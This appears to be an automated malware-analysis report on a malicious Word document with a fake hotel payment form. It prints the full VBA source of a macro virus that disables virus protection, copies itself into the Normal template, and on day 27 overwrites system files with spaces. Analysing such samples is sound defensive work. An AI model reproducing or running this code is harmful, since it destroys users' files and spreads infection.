MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
The sample is a malicious Word document containing a VBA macro named 'AutoOpen', which is a common technique for executing malicious code upon opening. The document body presents a fake payment authorization form for a hotel, aiming to deceive users into providing credit card information. The VBA script, identified as 'SYSTEM KILLER', attempts to copy itself to the Normal template, indicating an effort to establish persistence and spread.
Heuristics 4
-
ClamAV: Doc.Trojan.Alarm-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Alarm-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15067 bytes |
SHA-256: 171a0b6584c30b816abf829530d59b9e3fc8a3149d0af8d7413f360c07be4d97 |
|||
|
Detection
ClamAV:
Doc.Trojan.Alarm-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "AutoOpen"
'The name is SYSTEM KILLER,Version 1.0
Public Sub MAIN()
Dim MyFile$
Dim x
Dim normal
Dim OkExist
Dim i
Dim TemplateName$
Dim active
Dim internal
Dim alarmtime
Dim alarm$
On Error GoTo PassErr
Word.Options.VirusProtection = False
If Day(Now()) = 27 Then OutBreak 'SYSTEM KILLER纪念日
'MsgBox Day(Now())
'如果未打开任何文档则运行bye2
If Application.Documents.Count = 0 Then GoTo Bye2
'设置文档模式
Dim dlg As Object
Set dlg = WordBasic.DialogRecord.FileSaveAs(False)
'获取文件名,保存在MyFile$中
MyFile$ = WordBasic.[FileName$]()
If InStr(1, MyFile$, "文档") = 1 Then
x = WordBasic.Dialog.FileSaveAs(dlg)
MyFile$ = dlg.Name
Else
WordBasic.CurValues.FileSaveAs dlg
MyFile$ = dlg.Name
End If
'如果为宏文档则执行bye2
If WordBasic.IsMacro(0) = -1 Then GoTo Bye2
'如果为新文档则执行bye1
If MyFile$ = "" Then GoTo Bye1
'以模板格式保存文件
If dlg.Format = 0 Then
WordBasic.FileSaveAs Name:=MyFile$, Format:=1, LockAnnot:=0, Password:="", AddToMru:=1, WritePassword:="", RecommendReadOnly:=0, EmbedFonts:=0, NativePictureFormat:=0, FormsData:=0, SaveAsAOCELetter:=0
Else
WordBasic.FileSave
End If
'在Normal模板中寻找AutoOpen宏,找到则置OkExist=1,反之则置OkExist=0
normal = WordBasic.CountMacros(0)
OkExist = 0
For i = 1 To normal
If WordBasic.[MacroName$](i, 0) = "AutoOpen" Then OkExist = 1
Next i
'获取Normal模板的名称
TemplateName$ = WordBasic.[DefaultDir$](2) + "\NORMAL.DOT"
'把AutoOpen宏拷贝到Normal模板中
If OkExist <> 1 Then
WordBasic.Organizer Copy:=1, Source:=MyFile$, Destination:=TemplateName$, Name:="AutoOpen", Tab:=3
'WordBasic.FileSaveAs Name:=TemplateName$, Format:=1, LockAnnot:=0, Password:="", AddToMru:=0, WritePassword:="", RecommendReadOnly:=0, EmbedFonts:=0, NativePictureFormat:=0, FormsData:=0, SaveAsAOCELetter:=0
End If
'在活动文档中寻找AutoOpen宏,找到则置OkExist=1,反之则置OkExist=0
active = WordBasic.CountMacros(1)
OkExist = 0
For i = 1 To active
If WordBasic.[MacroName$](i, 1) = "AutoOpen" Then OkExist = 1
Next i
'把AutoOpen宏拷贝到活动模板中
If OkExist <> 1 Then
WordBasic.Organizer Copy:=1, Source:=TemplateName$, Destination:=MyFile$, Name:="AutoOpen", Tab:=3
WordBasic.FileSave
End If
'设置新文档模式
Bye1:
dlg.Format = 0
'设置定时器以便再次运行AutoOpen宏
Bye2:
internal = 5 / 24 / 60 ' internal time is 5 minutes系统时间5分钟
alarmtime = WordBasic.TimeValue(WordBasic.[Time$]()) + internal
alarm$ = WordBasic.[Time$](alarmtime)
WordBasic.OnTime alarm$, "AutoOpen"
'如果出错则此次运行不再处理
PassErr:
End Sub
Private Sub OutBreak()
Const MyPath$ = "C:\WINDOWS\SYSTEM\" '指定路径
Const Sorry$ = "Sorry,"
Const MacroName$ = "SYSTEM KILLER V1.0使 "
Const InYour$ = " 中,"
Const Info$ = "个文件被破坏."
Dim MyName() As String
Dim i, j
Dim FileNumber As Integer
Dim PutSpace
Dim TotalWrite As Integer
i = 1
ReDim MyName(1000)
'找寻第一项
MyName(i) = Dir(MyPath, 2) '用2找到隐藏文件
'开始循环
Do While MyName(i) <> ""
'MsgBox MyName(i)
'解决文件属性问题
If GetAttr(MyPath & MyName(i)) <> vbNormal Then SetAttr MyPath & MyName(i), vbNormal
i = i + 1
If i >= 500 Then ReDim Preserve MyName(UBound(MyName) + 100)
'查找下一个
MyName(i) = Dir(, 2)
Loop
FileNumber = 1
Total = 0
'开始改写过程
For j = 1 To i - 1
On Error GoTo ErrNext
Open MyPath & MyName(j) For Binary As #FileNumber
'清文件为n...个...
If LOF(FileNumber) < 5 Then PutSpace = 1 Else PutSpace = LOF(FileNumber) - 4 '小文件
Put #FileNumber, 1, Space(PutSpace)
TotalWrite = TotalWrite + 1
Close #FileNumber
FileNumber = FreeFile()
ErrNext:
Next j
MsgBox Sorry & MacroName & MyPath & InYour & Str(TotalWrite) & Info
End Sub
' Processing file: /opt/analyzer/scan_staging/e33c4558bbc64f2380831b4c4512f297.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocum
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.